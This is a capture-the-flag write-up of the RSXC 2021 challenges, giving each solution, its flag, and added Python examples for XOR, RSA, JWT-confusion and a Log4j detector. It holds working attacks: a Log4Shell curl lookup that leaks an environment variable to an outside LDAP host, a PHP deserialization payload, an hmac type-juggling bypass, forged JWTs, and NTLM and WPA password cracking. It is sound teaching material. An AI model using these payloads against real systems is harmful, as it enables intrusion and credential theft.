Solutions for River Security Xmas Challenge (RSXC) 2021
Challenges were available on http://rsxc.no
Solution: nmap -p30000-31000 rsxc.no
$ nc rsxc.no 30780
RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}
Solution: Brute force the single byte with a Python script
$ echo -en "\xd4" | nc rsxc.no 20002
RSXC{You_found_the_magic_byte_I_wanted_Good_job!}
Decoding chain: data -> Base64 -> Base58 (Ripple alphabet) -> Bzip2 -> Base85 -> Morse code -> hex -> Base32 ->
RSXC{I_hope_you_used_cyber_chef_it_does_make_it_alot_easier}
Known plaintext: RSXC
XOR each ciphertext byte against candidate key bytes until the known plaintext appears.
This gives the key: 0x88 0xc5 0x54 0xd5
Using this key cyclically on the input gives:
RSXC{Most_would_say_XOR_isn't_that_useful_anymore}
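The known-plaintext recovery above, as an added example (not the writeup's script): each key byte falls out directly as c[i] ^ p[i], a period check guards against the known prefix being longer than the key, and the sample ciphertext is constructed here with the key the writeup found. It assumes the key is no longer than the known prefix.

```python
KEY_FOUND = bytes([0x88, 0xC5, 0x54, 0xD5])  # the key the writeup recovered


def recover_key(ciphertext, known_prefix):
    """Known-plaintext attack on repeating-key XOR: key[i] = c[i] ^ p[i].
    This is the closed form of trying all 256 values per position until the plaintext appears."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_prefix))


def key_period(key_bytes):
    """Shortest period that explains the recovered bytes, i.e. the likely key length.
    Only meaningful when the known prefix is at least as long as the real key."""
    for length in range(1, len(key_bytes) + 1):
        if all(key_bytes[i] == key_bytes[i % length] for i in range(len(key_bytes))):
            return length


def xor_cyclic(data, key):
    """Apply the key cyclically; XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_with_known_prefix(ciphertext, known_prefix=b"RSXC"):
    key = recover_key(ciphertext, known_prefix)
    return xor_cyclic(ciphertext, key[: key_period(key)])


# Constructed sample: a made-up flag encrypted with the writeup's key, not the real challenge file.
SAMPLE_PLAINTEXT = b"RSXC{constructed_xor_sample}"
SAMPLE_CIPHERTEXT = xor_cyclic(SAMPLE_PLAINTEXT, KEY_FOUND)
```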
PCAP file, open it in Wireshark.
Identify the TCP stream: an IRC connection with the hint
"What about encrypting a zip file containing the flag? Let's say a 10 digit long number above 9 954 000 000 as the password?"
Identify the FTP transfer: flag.zip, extract it to a file.
Brute force the password with a Python script.
Found password: 9954359864
Extracting flag.txt gives:
RSXC{Good_job_analyzing_the_pcap_did_you_see_the_hint?}
Vigenère cipher
Manually brute force the key until the known prefix RSXC appears: YMZH
Through trial and error the next key letter is: G
Full key YMZHG ->
RSXC{isthisnotjustafancycaesarcipher}
The Exif data contains a thumbnail:
$ exif -e 07-challenge.jpg
Wrote file '07-challenge.jpg.modified.jpeg'
The thumbnail contains the flag:
RSXC{Sometimes_metadata_hides_stuff}
Decrement the note ID in the URL to find a hidden note with the flag:
http://rsxc.no:20008/notes.php?id=0
RSXC{Remember_to_secure_your_direct_object_references}
The note ID is the MD5 hash of the note name:
"note0" -> 65b29a77142a5c237d7b21c005b72157
"flag" -> http://rsxc.no:20009/notes.php?id=327a6c4304ad5938eaf0efb6cc3e53dc
RSXC{MD5_should_not_be_used_for_security.Especially_not_with_known_plaintext}
The server sends a Flag HTTP header:
RSXC{Sometimes_headers_can_tell_you_something_useful}
RSA: since q is selected based on p*p, we know n is approximately p**3 (p cubed).
We approximate the cube root of n and iterate downward over the previous primes until we find the correct value of p, and hence q.
Decrypting the ciphertext gives:
RSXC{Good_Job!I_see_you_know_how_to_do_some_math_and_how_rsa_works}
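The cube-root attack described above, as an added example (not the writeup's script) with constructed parameters: p is a prime just above 2**64 and q the next prime above p*p, so the walk down from the cube root hits p almost immediately. It assumes q > p*p, as the challenge's key generation implies; if q were below p*p the walk would have to go upward instead.

```python
from itertools import count

BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def icbrt(n):
    """Floor of the integer cube root of n (Newton iteration started above the root)."""
    x = 1 << ((n.bit_length() + 2) // 3)
    while (y := (2 * x + n // (x * x)) // 3) < x:
        x = y
    return x

def is_prime(n):
    """Miller-Rabin over fixed bases: deterministic below ~3.3e24, strong probable-prime above."""
    if n < 2 or any(n % b == 0 for b in BASES):
        return n in BASES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def next_prime(n):
    return next(c for c in count(n + 1) if is_prime(c))

def recover_p(n):
    """q sits just above p*p, so n is barely above p**3: step down from cbrt(n) to the prime dividing n."""
    return next(c for c in range(icbrt(n), 1, -1) if n % c == 0 and is_prime(c))

def decrypt(n, e, c):
    p = recover_p(n)
    d = pow(e, -1, (p - 1) * (n // p - 1))  # modular inverse, Python 3.8+
    return pow(c, d, n).to_bytes((n.bit_length() + 7) // 8, "big").lstrip(b"\0")

# Constructed sample key (not the challenge's real parameters): q is the next prime above p*p.
E = 65537
P = next_prime(1 << 64)
Q = next_prime(P * P)
N = P * Q
FLAG = b"RSXC{sample_flag}"  # 17 bytes, far below the ~192-bit modulus
C = pow(int.from_bytes(FLAG, "big"), E, N)
```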
Read the "encoding" and the input from the socket, perform the action, and send the response back. Repeat 100 times within 12 seconds.
RSXC{Seems_like_you_have_a_knack_for_encoding_and_talking_to_servers!}
React web app.
Todos.js contains a base64 encoded string:
RSXC{it_might_be_there_even_if_you_don't_include_it!}
The server issues a JWT with algorithm "RS256" and a payload with username "test".
The public key is available for verification.
Changing the algorithm to "HS256" and using the public key as the HMAC secret also produces a token the server accepts.
Changing the username to "admin" reveals the flag:
RSXC{You_have_to_remember_to_limit_what_algorithms_are_allowed}
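Added illustration of the algorithm confusion (not the challenge's server code), using only the standard library: forge_hs256 mints the token with the public key file as the HMAC secret, verify_confused reproduces the flawed dispatch on the token's own alg header, and verify_pinned is the fix. The RSA check is passed in as a function; the stand-in here rejects everything, which makes the point that the forged token never reaches it. The PEM is a placeholder, not a real key.

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def forge_hs256(payload, secret):
    """Mint an HS256 token; the attacker uses the server's public key file as the HMAC secret."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

def verify_confused(token, public_key_pem, rsa_verify):
    """Vulnerable: the token's own alg header decides which check runs, and the same key
    material (the RSA public key) is handed to whichever branch that is."""
    head, body, sig = token.split(".")
    alg = json.loads(b64url_decode(head)).get("alg")
    signing_input = f"{head}.{body}".encode()
    if alg == "RS256":
        ok = rsa_verify(public_key_pem, signing_input, b64url_decode(sig))
    elif alg == "HS256":
        expected = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(expected, b64url_decode(sig))
    else:
        ok = False
    return json.loads(b64url_decode(body)) if ok else None

def verify_pinned(token, public_key_pem, rsa_verify, allowed=("RS256",)):
    """Fixed: the server, not the token, decides which algorithms are acceptable."""
    alg = json.loads(b64url_decode(token.split(".")[0])).get("alg")
    if alg not in allowed:
        return None
    return verify_confused(token, public_key_pem, rsa_verify)

# Constructed stand-ins: a placeholder PEM (whatever bytes the server loads as its key) and an
# RSA verifier that rejects everything, in place of a real one (e.g. from the cryptography package).
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"

def rsa_reject_all(_key_pem, _signing_input, _signature):
    return False

FORGED = forge_hs256({"username": "admin"}, PUBLIC_KEY_PEM)
```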
Modifying the key ID (kid) header lets us point the server at our own public key URL.
This allows us to sign the token with our own key and have the server validate it with that key.
Modifying kid and the username in the payload gives the flag:
RSXC{Don't_let_others_decide_where_your_keys_are_located}
Obfuscated script. Deobfuscating it through several levels gives an invalid payload URL and a "hidden" base64 string which contains the flag:
RSXC{Don't_blindly_trust_obfuscated_code_it_might_do_something_bad}
PHP source is available. Files are read based on unserialized user input.
Craft a serialized object of the Card class: O:4:"Card":1:{s:4:"file";s:8:"flag.txt";}
Pass it base64 encoded as the card GET parameter and flag.txt is read:
RSXC{Care_needs_to_be_taken_with_user_supplied_input.It_should_never_be_trusted}
Unpack the Docker image repository. Locate the previous layer with the file still intact, extract it and voila:
RSXC{Now_you_know_that_docker_images_are_like_onions.They_have_many_layers}
Another include with the filename taken from the URL.
Just pass base64('flag.txt') as the card parameter in the URL to get the flag:
RSXC{It_is_not_smart_to_let_people_include_whatever_they_want}
The provided PHP code reads a JSON document with an hmac field from the input data.
The parameters to hash_hmac are in the wrong order, which lets us choose the algorithm. We also have the key, but not the data parameter.
However, we can pass an invalid algorithm so that hash_hmac returns false, and set the input hmac to 0 (loosely equal to false in PHP):
$ curl -d '{"host":"none","hmac":0}' http://rsxc.no:20020/api.php
RSXC{You_have_to_have_the_right_order_for_arguments!}
LSASS.exe dump.
We can get the password hash with pypykatz:
== MSV ==
Username: river-security-xmas
Domain: DESKTOP-V1MQH3P
LM: NA
NT: 7801ee9c5762bb027ee224d54cb8f62e
SHA1: bebad302f8e64b59279c3a6747db0e076800d9ca
The challenge text mentions "rock our world", hinting at the RockYou dictionary (thanks Google).
Using hashcat with the rockyou dictionary from Kali on the NTLM hash gives the password:
alliwantforchristmasisyou
The file is a Wi-Fi traffic capture of a WPA reauthentication.
Once again the challenge text mentions "you rock", hinting at the rockyou.txt dictionary.
We filter the dictionary for passwords starting with S, as per the challenge text.
Then run aircrack-ng on the cap file,
which returns the key: Santaclaws99
Decrypting the capture file with airdecap-ng and opening it in Wireshark reveals a single TCP stream.
Following the stream we get the flag:
RSXC{WIFI_is_fun}
Scan the server with dirb, looking for flag.txt:
$ dirb http://rsxc.no:20023/ wordlists/big.txt -X /flag.txt
+ http://rsxc.no:20023/logfile/flag.txt (CODE:200|SIZE:120)
RSXC{Content_discovery_is_a_useful_to_know.Good_job_finding_the_flag}
The challenge text hints at logging, and most likely the Log4j vulnerability.
Experimenting with headers and ${jndi} lookups leads to an attack vector.
Since I don't want to install Java on my public-facing server, I ran JNDIExploit-1.2 locally
and port-forwarded a public-facing port to it. Then running the attack query:
$ curl rsxc.no:20024 -v -H "User-Agent: \${jndi:ldap://<REDACTEDIP>:8008/\${env:FLAG}}"
leads to a received LDAP query:
[+] Received LDAP Query: base32_KJJVQQ33K5SV6ZDPL5WGS23FL5WG6Z3HNFXGOX3SNFTWQ5B7PU
which, when base32 decoded, gives the flag:
RSXC{We_do_like_logging_right?}
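Defender-side counterpart, added here and not part of the writeup: a scanner that flags ${jndi:...} lookups in log lines (including the nested ${env:...} form used above) and a decoder for the base32 label JNDIExploit printed. The log lines and the 203.0.113.5 address are constructed; the pattern is the literal form from the writeup, so treat it as one signal rather than complete coverage.

```python
import base64
import re

JNDI_START = re.compile(r"\$\{jndi:", re.IGNORECASE)

def balanced_lookup(text, start):
    """Return the ${...} expression starting at text[start], honouring nested ${...} lookups."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]  # unterminated lookup: return the rest of the line

def find_jndi_lookups(line):
    """Report every ${jndi:...} lookup in a log line, with its protocol and any nested lookups."""
    hits = []
    for m in JNDI_START.finditer(line):
        expr = balanced_lookup(line, m.start())
        target = expr[7:-1] if expr.endswith("}") else expr[7:]  # strip "${jndi:" and the closing brace
        hits.append({
            "expr": expr,
            "scheme": target.split(":", 1)[0].lower(),
            "nested": [n.lower() for n in re.findall(r"\$\{(\w+):", target)],
        })
    return hits

def decode_callback_label(label):
    """JNDIExploit reported the leaked value as 'base32_<data>'; restore padding and decode it."""
    data = label.split("base32_", 1)[1]
    return base64.b32decode(data + "=" * (-len(data) % 8)).decode()

def scan(lines):
    """(line index, hit) for every lookup found across a batch of log lines."""
    return [(i, hit) for i, line in enumerate(lines) for hit in find_jndi_lookups(line)]

# Constructed access-log lines; 203.0.113.5 is a documentation address, not the writeup's host.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:8008/${env:FLAG}}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${JNDI:rmi://203.0.113.5:1099/a}"',
]
```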